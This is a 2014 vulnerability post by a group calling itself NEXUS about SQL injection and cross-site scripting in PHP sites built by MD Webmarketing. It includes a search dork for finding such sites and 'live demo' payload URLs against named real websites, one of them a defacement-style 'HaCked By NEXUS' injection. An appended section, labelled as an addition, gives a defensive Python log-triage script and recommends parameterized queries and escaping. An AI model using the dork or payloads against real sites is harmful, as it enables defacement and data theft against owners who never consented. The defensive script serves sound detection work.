Friday, 4 July 2014

MD Webmarketing Cross Site Scripting / SQL Injection

Dork:
"Desenvolvido por: MD-WEBMARKETING" inurl:.php?id=

Exploits:
http://www.site-web.com/***.php?id= [SQL Injection]
http://www.site-web.com/***.php?id=**********&busca= [Cross Site Scripting]

Live Demo:

SQL Injection:
http://www.pierreadrileiloes.com.br/exibe.php?id=61712%27



XSS (with injected HTML):
http://www.edinhoneves.com/exibe.php?id=231&cod_editorial=1&url=index.php&pag=0&busca=%22%3E%3Ch1%3EHaCked%20By%20NEXUS%20!%3C/h1%3E


XSS (with JavaScript):
http://www.edinhoneves.com/exibe.php?id=231&cod_editorial=1&url=index.php&pag=0&busca=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E
http://www.edinhoneves.com/exibe.php?id=231&cod_editorial=1&url=index.php&pag=0&busca=%22%3E%3Cimg%20src=x%20onerror=alert%28%22NEXUS%22%29;%3E 


NEXUS - Sharing Is Caring
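
An added example, not part of the original advisory: a log triage script a site owner could run to flag requests matching the two patterns listed above (a non-integer `id`, or HTML-delimiting characters in `busca`). The log lines are constructed, and the assumption that legitimate traffic always sends an integer `id` is inferred from the URLs shown, not stated by the vendor.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format). Client IPs are
# documentation addresses; the busca value in line 3 is a harmless stand-in.
SAMPLE_LOG = r'''
192.0.2.10 - - [04/Jul/2014:10:00:01 +0000] "GET /exibe.php?id=231&cod_editorial=1&url=index.php&pag=0 HTTP/1.1" 200 5120
192.0.2.11 - - [04/Jul/2014:10:00:05 +0000] "GET /exibe.php?id=61712%27 HTTP/1.1" 200 312
192.0.2.12 - - [04/Jul/2014:10:00:09 +0000] "GET /exibe.php?id=231&busca=%22%3E%3Ch1%3Etest%3C/h1%3E HTTP/1.1" 200 5301
192.0.2.13 - - [04/Jul/2014:10:00:12 +0000] "GET /exibe.php?id=231&busca=leilao+de+arte HTTP/1.1" 200 5200
'''

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
ID_RE = re.compile(r'[0-9]+')      # assumption: a valid id is a plain integer
MARKUP_RE = re.compile(r'[<>"]')   # characters that can break out of an HTML attribute


def classify(target):
    """Return the list of findings for one request target (path + query)."""
    url = urlsplit(target)
    if not url.path.endswith(".php"):
        return []
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    findings = []
    # Anything other than digits in id (a quote, a keyword, an empty value) is suspect.
    if any(not ID_RE.fullmatch(v) for v in params.get("id", [])):
        findings.append("non-numeric id")
    # busca is free text, but a search term should not carry markup delimiters.
    if any(MARKUP_RE.search(v) for v in params.get("busca", [])):
        findings.append("markup in busca")
    return findings


def scan(log_text):
    """Yield (client_ip, request_target, findings) for each suspicious line."""
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m:
            findings = classify(m.group(2))
            if findings:
                yield m.group(1), m.group(2), findings


if __name__ == "__main__":
    for ip, target, findings in scan(SAMPLE_LOG):
        print(ip, ", ".join(findings), target)
```

Log triage only shows who has probed the site; the fix itself is a parameterized query for `id` and HTML-escaping `busca` wherever it is echoed back into the page.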